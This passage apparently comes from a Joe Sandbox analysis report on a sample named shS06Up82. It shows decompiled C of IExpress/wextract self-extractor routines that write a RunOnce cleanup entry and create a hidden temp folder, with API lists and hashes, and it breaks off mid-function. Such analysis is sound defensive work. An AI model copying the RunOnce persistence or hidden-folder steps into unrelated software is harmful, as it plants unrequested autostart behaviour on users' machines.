                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3192549508-0
                                                                                                                                                                                                      • Opcode ID: d09581490a3dd1ea6222018a35d482404f07f47a279c5eb85fab1035e6a3000e
                                                                                                                                                                                                      • Instruction ID: fcd6ac0a2ce761599bc1e9d887a36397da29c29b4041e3304452689117aec2fe
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d09581490a3dd1ea6222018a35d482404f07f47a279c5eb85fab1035e6a3000e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 939002642515904796221B719E5A46579995A9E783F815660F011D84D4DB6050405512
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                                                                      			E003E202A(struct HINSTANCE__* __edx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				char _v528;
                                                                                                                                                                                                      				void* _v532;
                                                                                                                                                                                                      				int _v536;
                                                                                                                                                                                                      				int _v540;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t28;
                                                                                                                                                                                                      				long _t36;
                                                                                                                                                                                                      				long _t41;
                                                                                                                                                                                                      				struct HINSTANCE__* _t46;
                                                                                                                                                                                                      				intOrPtr _t49;
                                                                                                                                                                                                      				intOrPtr _t50;
                                                                                                                                                                                                      				CHAR* _t54;
                                                                                                                                                                                                      				void _t56;
                                                                                                                                                                                                      				signed int _t66;
                                                                                                                                                                                                      				intOrPtr* _t72;
                                                                                                                                                                                                      				void* _t73;
                                                                                                                                                                                                      				void* _t75;
                                                                                                                                                                                                      				void* _t80;
                                                                                                                                                                                                      				intOrPtr* _t81;
                                                                                                                                                                                                      				void* _t86;
                                                                                                                                                                                                      				void* _t87;
                                                                                                                                                                                                      				void* _t90;
                                                                                                                                                                                                      				_Unknown_base(*)()* _t91;
                                                                                                                                                                                                      				signed int _t93;
                                                                                                                                                                                                      				void* _t94;
                                                                                                                                                                                                      				void* _t95;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t79 = __edx;
                                                                                                                                                                                                      				_t28 =  *0x3e8004; // 0x59d037e4
                                                                                                                                                                                                      				_v8 = _t28 ^ _t93;
                                                                                                                                                                                                      				_t84 = 0x104;
                                                                                                                                                                                                      				memset( &_v268, 0, 0x104);
                                                                                                                                                                                                      				memset( &_v528, 0, 0x104);
                                                                                                                                                                                                      				_t95 = _t94 + 0x18;
                                                                                                                                                                                                      				_t66 = 0;
                                                                                                                                                                                                      				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                                                                                                                                                                                                      				if(_t36 != 0) {
                                                                                                                                                                                                      					L24:
                                                                                                                                                                                                      					return E003E6CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_push(_t86);
                                                                                                                                                                                                      				_t87 = 0;
                                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                                      					E003E171E("wextract_cleanup1", 0x50, "wextract_cleanup%d", _t87);
                                                                                                                                                                                                      					_t95 = _t95 + 0x10;
                                                                                                                                                                                                      					_t41 = RegQueryValueExA(_v532, "wextract_cleanup1", 0, 0, 0,  &_v540); // executed
                                                                                                                                                                                                      					if(_t41 != 0) {
                                                                                                                                                                                                      						break;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t87 = _t87 + 1;
                                                                                                                                                                                                      					if(_t87 < 0xc8) {
                                                                                                                                                                                                      						continue;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					break;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(_t87 != 0xc8) {
                                                                                                                                                                                                      					GetSystemDirectoryA( &_v528, _t84);
                                                                                                                                                                                                      					_t79 = _t84;
                                                                                                                                                                                                      					E003E658A( &_v528, _t84, "advpack.dll");
                                                                                                                                                                                                      					_t46 = LoadLibraryA( &_v528); // executed
                                                                                                                                                                                                      					_t84 = _t46;
                                                                                                                                                                                                      					if(_t84 == 0) {
                                                                                                                                                                                                      						L10:
                                                                                                                                                                                                      						if(GetModuleFileNameA( *0x3e9a3c,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                      							L17:
                                                                                                                                                                                                      							_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                      							L23:
                                                                                                                                                                                                      							_pop(_t86);
                                                                                                                                                                                                      							goto L24;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						L11:
                                                                                                                                                                                                      						_t72 =  &_v268;
                                                                                                                                                                                                      						_t80 = _t72 + 1;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t49 =  *_t72;
                                                                                                                                                                                                      							_t72 = _t72 + 1;
                                                                                                                                                                                                      						} while (_t49 != 0);
                                                                                                                                                                                                      						_t73 = _t72 - _t80;
                                                                                                                                                                                                      						_t81 = 0x3e91e4;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t50 =  *_t81;
                                                                                                                                                                                                      							_t81 = _t81 + 1;
                                                                                                                                                                                                      						} while (_t50 != 0);
                                                                                                                                                                                                      						_t84 = _t73 + 0x50 + _t81 - 0x3e91e5;
                                                                                                                                                                                                      						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x3e91e5);
                                                                                                                                                                                                      						if(_t90 != 0) {
                                                                                                                                                                                                      							 *0x3e8580 = _t66 ^ 0x00000001;
                                                                                                                                                                                                      							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                                                                                                                                                                                                      							if(_t66 == 0) {
                                                                                                                                                                                                      								_t54 = "%s /D:%s";
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_push("C:\Users\alfons\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                      							E003E171E(_t90, _t84, _t54,  &_v268);
                                                                                                                                                                                                      							_t75 = _t90;
                                                                                                                                                                                                      							_t23 = _t75 + 1; // 0x1
                                                                                                                                                                                                      							_t79 = _t23;
                                                                                                                                                                                                      							do {
                                                                                                                                                                                                      								_t56 =  *_t75;
                                                                                                                                                                                                      								_t75 = _t75 + 1;
                                                                                                                                                                                                      							} while (_t56 != 0);
                                                                                                                                                                                                      							_t24 = _t75 - _t79 + 1; // 0x2
                                                                                                                                                                                                      							RegSetValueExA(_v532, "wextract_cleanup1", 0, 1, _t90, _t24); // executed
                                                                                                                                                                                                      							RegCloseKey(_v532); // executed
                                                                                                                                                                                                      							_t36 = LocalFree(_t90);
                                                                                                                                                                                                      							goto L23;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t79 = 0x4b5;
                                                                                                                                                                                                      						E003E44B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                                                                                                                                                                                                      						goto L17;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                                                                                                                                                                                                      					_t66 = 0 | _t91 != 0x00000000;
                                                                                                                                                                                                      					FreeLibrary(_t84); // executed
                                                                                                                                                                                                      					if(_t91 == 0) {
                                                                                                                                                                                                      						goto L10;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                      						E003E658A( &_v268, 0x104, 0x3e1140);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					goto L11;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                      				 *0x3e8530 = _t66;
                                                                                                                                                                                                      				goto L23;
                                                                                                                                                                                                      			}

































                                                                                                                                                                                                      0x003e202a
                                                                                                                                                                                                      0x003e2035
                                                                                                                                                                                                      0x003e203c
                                                                                                                                                                                                      0x003e2041
                                                                                                                                                                                                      0x003e2050
                                                                                                                                                                                                      0x003e205f
                                                                                                                                                                                                      0x003e2064
                                                                                                                                                                                                      0x003e206f
                                                                                                                                                                                                      0x003e208c
                                                                                                                                                                                                      0x003e2094
                                                                                                                                                                                                      0x003e2257
                                                                                                                                                                                                      0x003e2266
                                                                                                                                                                                                      0x003e2266
                                                                                                                                                                                                      0x003e209a
                                                                                                                                                                                                      0x003e209b
                                                                                                                                                                                                      0x003e209d
                                                                                                                                                                                                      0x003e20aa
                                                                                                                                                                                                      0x003e20af
                                                                                                                                                                                                      0x003e20c9
                                                                                                                                                                                                      0x003e20d1
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e20d3
                                                                                                                                                                                                      0x003e20da
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e20da
                                                                                                                                                                                                      0x003e20e2
                                                                                                                                                                                                      0x003e2103
                                                                                                                                                                                                      0x003e210e
                                                                                                                                                                                                      0x003e2116
                                                                                                                                                                                                      0x003e2122
                                                                                                                                                                                                      0x003e2128
                                                                                                                                                                                                      0x003e212c
                                                                                                                                                                                                      0x003e2179
                                                                                                                                                                                                      0x003e2194
                                                                                                                                                                                                      0x003e21de
                                                                                                                                                                                                      0x003e21e4
                                                                                                                                                                                                      0x003e2256
                                                                                                                                                                                                      0x003e2256
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e2256
                                                                                                                                                                                                      0x003e2196
                                                                                                                                                                                                      0x003e2196
                                                                                                                                                                                                      0x003e219c
                                                                                                                                                                                                      0x003e219f
                                                                                                                                                                                                      0x003e219f
                                                                                                                                                                                                      0x003e21a1
                                                                                                                                                                                                      0x003e21a2
                                                                                                                                                                                                      0x003e21a6
                                                                                                                                                                                                      0x003e21a8
                                                                                                                                                                                                      0x003e21b0
                                                                                                                                                                                                      0x003e21b0
                                                                                                                                                                                                      0x003e21b2
                                                                                                                                                                                                      0x003e21b3
                                                                                                                                                                                                      0x003e21bc
                                                                                                                                                                                                      0x003e21c7
                                                                                                                                                                                                      0x003e21cb
                                                                                                                                                                                                      0x003e21f1
                                                                                                                                                                                                      0x003e21f6
                                                                                                                                                                                                      0x003e21fd
                                                                                                                                                                                                      0x003e21ff
                                                                                                                                                                                                      0x003e21ff
                                                                                                                                                                                                      0x003e2204
                                                                                                                                                                                                      0x003e2213
                                                                                                                                                                                                      0x003e2218
                                                                                                                                                                                                      0x003e221d
                                                                                                                                                                                                      0x003e221d
                                                                                                                                                                                                      0x003e2220
                                                                                                                                                                                                      0x003e2220
                                                                                                                                                                                                      0x003e2222
                                                                                                                                                                                                      0x003e2223
                                                                                                                                                                                                      0x003e2229
                                                                                                                                                                                                      0x003e223d
                                                                                                                                                                                                      0x003e2249
                                                                                                                                                                                                      0x003e2250
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e2250
                                                                                                                                                                                                      0x003e21d2
                                                                                                                                                                                                      0x003e21d9
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e21d9
                                                                                                                                                                                                      0x003e213a
                                                                                                                                                                                                      0x003e2141
                                                                                                                                                                                                      0x003e2144
                                                                                                                                                                                                      0x003e214c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e2163
                                                                                                                                                                                                      0x003e2172
                                                                                                                                                                                                      0x003e2172
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e2163
                                                                                                                                                                                                      0x003e20ea
                                                                                                                                                                                                      0x003e20f0
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • memset.MSVCRT ref: 003E2050
                                                                                                                                                                                                      • memset.MSVCRT ref: 003E205F
                                                                                                                                                                                                      • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 003E208C
                                                                                                                                                                                                        • Part of subcall function 003E171E: _vsnprintf.MSVCRT ref: 003E1750
                                                                                                                                                                                                      • RegQueryValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003E20C9
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003E20EA
                                                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32 ref: 003E2103
                                                                                                                                                                                                      • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003E2122
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 003E2134
                                                                                                                                                                                                      • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003E2144
                                                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32 ref: 003E215B
                                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003E218C
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003E21C1
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003E21E4
                                                                                                                                                                                                      • RegSetValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 003E223D
                                                                                                                                                                                                      • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003E2249
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003E2250
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                                                                                                                                      • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup1
                                                                                                                                                                                                      • API String ID: 178549006-3073904943
                                                                                                                                                                                                      • Opcode ID: 2c2aa6f9e04970d5bc20565392265fe1d7a65d559bacbf5095e8b9606a324efb
                                                                                                                                                                                                      • Instruction ID: 5c0d928aa5239ee7c2cf9c1d7a1fad28f56cd18caf8faebd869b15edf627a0e6
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2c2aa6f9e04970d5bc20565392265fe1d7a65d559bacbf5095e8b9606a324efb
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6151FD719002B4ABDB339B62DC89FEB772CEB55700F0103A4FA49EA1D1DA719E458B50
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 232 3e55a0-3e55d9 call 3e468f LocalAlloc 235 3e55fd-3e560c call 3e468f 232->235 236 3e55db-3e55f1 call 3e44b9 call 3e6285 232->236 242 3e560e-3e5630 call 3e44b9 LocalFree 235->242 243 3e5632-3e5643 lstrcmpA 235->243 248 3e55f6-3e55f8 236->248 242->248 246 3e564b-3e5659 LocalFree 243->246 247 3e5645 243->247 250 3e565b-3e565d 246->250 251 3e5696-3e569c 246->251 247->246 252 3e58b7-3e58c7 call 3e6ce0 248->252 255 3e565f-3e5667 250->255 256 3e5669 250->256 253 3e589f-3e58b5 call 3e6517 251->253 254 3e56a2-3e56a8 251->254 253->252 254->253 260 3e56ae-3e56c1 GetTempPathA 254->260 255->256 257 3e566b-3e567a call 3e5467 255->257 256->257 269 3e589b-3e589d 257->269 270 3e5680-3e5691 call 3e44b9 257->270 264 3e56f3-3e5711 call 3e1781 260->264 265 3e56c3-3e56c9 call 3e5467 260->265 274 3e586c-3e5890 GetWindowsDirectoryA call 3e597d 264->274 275 3e5717-3e5729 GetDriveTypeA 264->275 272 3e56ce-3e56d0 265->272 269->252 270->248 272->269 276 3e56d6-3e56df call 3e2630 272->276 274->264 289 3e5896 274->289 278 3e572b-3e572e 275->278 279 3e5730-3e5740 GetFileAttributesA 275->279 276->264 290 3e56e1-3e56ed call 3e5467 276->290 278->279 282 3e5742-3e5745 278->282 279->282 283 3e577e-3e578f call 3e597d 279->283 287 3e576b 282->287 288 3e5747-3e574f 282->288 297 3e57b2-3e57bf call 3e2630 283->297 298 3e5791-3e579e call 3e2630 283->298 291 3e5771-3e5779 287->291 288->291 294 3e5751-3e5753 288->294 289->269 290->264 290->269 295 3e5864-3e5866 291->295 294->291 299 3e5755-3e5762 call 3e6952 294->299 295->274 295->275 307 3e57d3-3e57f8 call 3e658a GetFileAttributesA 297->307 308 3e57c1-3e57cd GetWindowsDirectoryA 297->308 298->287 306 3e57a0-3e57b0 call 3e597d 298->306 299->287 309 3e5764-3e5769 299->309 306->287 306->297 314 3e580a 307->314 315 3e57fa-3e5808 CreateDirectoryA 307->315 308->307 309->283 309->287 316 3e580d-3e580f 314->316 315->316 317 3e5827-3e585c SetFileAttributesA call 3e1781 call 3e5467 316->317 318 3e5811-3e5825 316->318 317->269 323 3e585e 317->323 318->295 323->295
                                                                                                                                                                                                      C-Code - Quality: 92%
                                                                                                                                                                                                      			E003E55A0(void* __eflags) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v265;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t28;
                                                                                                                                                                                                      				int _t32;
                                                                                                                                                                                                      				int _t33;
                                                                                                                                                                                                      				int _t35;
                                                                                                                                                                                                      				signed int _t36;
                                                                                                                                                                                                      				signed int _t38;
                                                                                                                                                                                                      				int _t40;
                                                                                                                                                                                                      				int _t44;
                                                                                                                                                                                                      				long _t48;
                                                                                                                                                                                                      				int _t49;
                                                                                                                                                                                                      				int _t50;
                                                                                                                                                                                                      				signed int _t53;
                                                                                                                                                                                                      				int _t54;
                                                                                                                                                                                                      				int _t59;
                                                                                                                                                                                                      				char _t60;
                                                                                                                                                                                                      				int _t65;
                                                                                                                                                                                                      				char _t66;
                                                                                                                                                                                                      				int _t67;
                                                                                                                                                                                                      				int _t68;
                                                                                                                                                                                                      				int _t69;
                                                                                                                                                                                                      				int _t70;
                                                                                                                                                                                                      				int _t71;
                                                                                                                                                                                                      				struct _SECURITY_ATTRIBUTES* _t72;
                                                                                                                                                                                                      				int _t73;
                                                                                                                                                                                                      				CHAR* _t82;
                                                                                                                                                                                                      				CHAR* _t88;
                                                                                                                                                                                                      				void* _t103;
                                                                                                                                                                                                      				signed int _t110;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t28 =  *0x3e8004; // 0x59d037e4
                                                                                                                                                                                                      				_v8 = _t28 ^ _t110;
                                                                                                                                                                                                      				_t2 = E003E468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                                                                                                                                                                      				_t109 = LocalAlloc(0x40, _t2);
                                                                                                                                                                                                      				if(_t109 != 0) {
                                                                                                                                                                                                      					_t82 = "RUNPROGRAM";
                                                                                                                                                                                                      					_t32 = E003E468F(_t82, _t109, 1);
                                                                                                                                                                                                      					__eflags = _t32;
                                                                                                                                                                                                      					if(_t32 != 0) {
                                                                                                                                                                                                      						_t33 = lstrcmpA(_t109, "<None>");
                                                                                                                                                                                                      						__eflags = _t33;
                                                                                                                                                                                                      						if(_t33 == 0) {
                                                                                                                                                                                                      							 *0x3e9a30 = 1;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						LocalFree(_t109);
                                                                                                                                                                                                      						_t35 =  *0x3e8b3e; // 0x0
                                                                                                                                                                                                      						__eflags = _t35;
                                                                                                                                                                                                      						if(_t35 == 0) {
                                                                                                                                                                                                      							__eflags =  *0x3e8a24; // 0x0
                                                                                                                                                                                                      							if(__eflags != 0) {
                                                                                                                                                                                                      								L46:
                                                                                                                                                                                                      								_t101 = 0x7d2;
                                                                                                                                                                                                      								_t36 = E003E6517(_t82, 0x7d2, 0, E003E3210, 0, 0);
                                                                                                                                                                                                      								asm("sbb eax, eax");
                                                                                                                                                                                                      								_t38 =  ~( ~_t36);
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								__eflags =  *0x3e9a30; // 0x0
                                                                                                                                                                                                      								if(__eflags != 0) {
                                                                                                                                                                                                      									goto L46;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_t109 = 0x3e91e4;
                                                                                                                                                                                                      									_t40 = GetTempPathA(0x104, 0x3e91e4);
                                                                                                                                                                                                      									__eflags = _t40;
                                                                                                                                                                                                      									if(_t40 == 0) {
                                                                                                                                                                                                      										L19:
                                                                                                                                                                                                      										_push(_t82);
                                                                                                                                                                                                      										E003E1781( &_v268, 0x104, _t82, "A:\\");
                                                                                                                                                                                                      										__eflags = _v268 - 0x5a;
                                                                                                                                                                                                      										if(_v268 <= 0x5a) {
                                                                                                                                                                                                      											do {
                                                                                                                                                                                                      												_t109 = GetDriveTypeA( &_v268);
                                                                                                                                                                                                      												__eflags = _t109 - 6;
                                                                                                                                                                                                      												if(_t109 == 6) {
                                                                                                                                                                                                      													L22:
                                                                                                                                                                                                      													_t48 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                      													__eflags = _t48 - 0xffffffff;
                                                                                                                                                                                                      													if(_t48 != 0xffffffff) {
                                                                                                                                                                                                      														goto L30;
                                                                                                                                                                                                      													} else {
                                                                                                                                                                                                      														goto L23;
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                      													__eflags = _t109 - 3;
                                                                                                                                                                                                      													if(_t109 != 3) {
                                                                                                                                                                                                      														L23:
                                                                                                                                                                                                      														__eflags = _t109 - 2;
                                                                                                                                                                                                      														if(_t109 != 2) {
                                                                                                                                                                                                      															L28:
                                                                                                                                                                                                      															_t66 = _v268;
                                                                                                                                                                                                      															goto L29;
                                                                                                                                                                                                      														} else {
                                                                                                                                                                                                      															_t66 = _v268;
                                                                                                                                                                                                      															__eflags = _t66 - 0x41;
                                                                                                                                                                                                      															if(_t66 == 0x41) {
                                                                                                                                                                                                      																L29:
                                                                                                                                                                                                      																_t60 = _t66 + 1;
                                                                                                                                                                                                      																_v268 = _t60;
                                                                                                                                                                                                      																goto L42;
                                                                                                                                                                                                      															} else {
                                                                                                                                                                                                      																__eflags = _t66 - 0x42;
                                                                                                                                                                                                      																if(_t66 == 0x42) {
                                                                                                                                                                                                      																	goto L29;
                                                                                                                                                                                                      																} else {
                                                                                                                                                                                                      																	_t68 = E003E6952( &_v268);
                                                                                                                                                                                                      																	__eflags = _t68;
                                                                                                                                                                                                      																	if(_t68 == 0) {
                                                                                                                                                                                                      																		goto L28;
                                                                                                                                                                                                      																	} else {
                                                                                                                                                                                                      																		__eflags = _t68 - 0x19000;
                                                                                                                                                                                                      																		if(_t68 >= 0x19000) {
                                                                                                                                                                                                      																			L30:
                                                                                                                                                                                                      																			_push(0);
                                                                                                                                                                                                      																			_t103 = 3;
                                                                                                                                                                                                      																			_t49 = E003E597D( &_v268, _t103, 1);
                                                                                                                                                                                                      																			__eflags = _t49;
                                                                                                                                                                                                      																			if(_t49 != 0) {
                                                                                                                                                                                                      																				L33:
                                                                                                                                                                                                      																				_t50 = E003E2630(0,  &_v268, 1);
                                                                                                                                                                                                      																				__eflags = _t50;
                                                                                                                                                                                                      																				if(_t50 != 0) {
                                                                                                                                                                                                      																					GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                      																				}
                                                                                                                                                                                                      																				_t88 =  &_v268;
                                                                                                                                                                                                      																				E003E658A(_t88, 0x104, "msdownld.tmp");
                                                                                                                                                                                                      																				_t53 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                      																				__eflags = _t53 - 0xffffffff;
                                                                                                                                                                                                      																				if(_t53 != 0xffffffff) {
                                                                                                                                                                                                      																					_t54 = _t53 & 0x00000010;
                                                                                                                                                                                                      																					__eflags = _t54;
                                                                                                                                                                                                      																				} else {
                                                                                                                                                                                                      																					_t54 = CreateDirectoryA( &_v268, 0);
                                                                                                                                                                                                      																				}
                                                                                                                                                                                                      																				__eflags = _t54;
                                                                                                                                                                                                      																				if(_t54 != 0) {
                                                                                                                                                                                                      																					SetFileAttributesA( &_v268, 2);
                                                                                                                                                                                                      																					_push(_t88);
                                                                                                                                                                                                      																					_t109 = 0x3e91e4;
                                                                                                                                                                                                      																					E003E1781(0x3e91e4, 0x104, _t88,  &_v268);
                                                                                                                                                                                                      																					_t101 = 1;
                                                                                                                                                                                                      																					_t59 = E003E5467(0x3e91e4, 1, 0);
                                                                                                                                                                                                      																					__eflags = _t59;
                                                                                                                                                                                                      																					if(_t59 != 0) {
                                                                                                                                                                                                      																						goto L45;
                                                                                                                                                                                                      																					} else {
                                                                                                                                                                                                      																						_t60 = _v268;
                                                                                                                                                                                                      																						goto L42;
                                                                                                                                                                                                      																					}
                                                                                                                                                                                                      																				} else {
                                                                                                                                                                                                      																					_t60 = _v268 + 1;
                                                                                                                                                                                                      																					_v265 = 0;
                                                                                                                                                                                                      																					_v268 = _t60;
                                                                                                                                                                                                      																					goto L42;
                                                                                                                                                                                                      																				}
                                                                                                                                                                                                      																			} else {
                                                                                                                                                                                                      																				_t65 = E003E2630(0,  &_v268, 1);
                                                                                                                                                                                                      																				__eflags = _t65;
                                                                                                                                                                                                      																				if(_t65 != 0) {
                                                                                                                                                                                                      																					goto L28;
                                                                                                                                                                                                      																				} else {
                                                                                                                                                                                                      																					_t67 = E003E597D( &_v268, 1, 1, 0);
                                                                                                                                                                                                      																					__eflags = _t67;
                                                                                                                                                                                                      																					if(_t67 == 0) {
                                                                                                                                                                                                      																						goto L28;
                                                                                                                                                                                                      																					} else {
                                                                                                                                                                                                      																						goto L33;
                                                                                                                                                                                                      																					}
                                                                                                                                                                                                      																				}
                                                                                                                                                                                                      																			}
                                                                                                                                                                                                      																		} else {
                                                                                                                                                                                                      																			goto L28;
                                                                                                                                                                                                      																		}
                                                                                                                                                                                                      																	}
                                                                                                                                                                                                      																}
                                                                                                                                                                                                      															}
                                                                                                                                                                                                      														}
                                                                                                                                                                                                      													} else {
                                                                                                                                                                                                      														goto L22;
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												goto L47;
                                                                                                                                                                                                      												L42:
                                                                                                                                                                                                      												__eflags = _t60 - 0x5a;
                                                                                                                                                                                                      											} while (_t60 <= 0x5a);
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										goto L43;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										_t101 = 1;
                                                                                                                                                                                                      										_t69 = E003E5467(0x3e91e4, 1, 3); // executed
                                                                                                                                                                                                      										__eflags = _t69;
                                                                                                                                                                                                      										if(_t69 != 0) {
                                                                                                                                                                                                      											goto L45;
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											_t82 = 0x3e91e4;
                                                                                                                                                                                                      											_t70 = E003E2630(0, 0x3e91e4, 1);
                                                                                                                                                                                                      											__eflags = _t70;
                                                                                                                                                                                                      											if(_t70 != 0) {
                                                                                                                                                                                                      												goto L19;
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												_t101 = 1;
                                                                                                                                                                                                      												_t82 = 0x3e91e4;
                                                                                                                                                                                                      												_t71 = E003E5467(0x3e91e4, 1, 1);
                                                                                                                                                                                                      												__eflags = _t71;
                                                                                                                                                                                                      												if(_t71 != 0) {
                                                                                                                                                                                                      													goto L45;
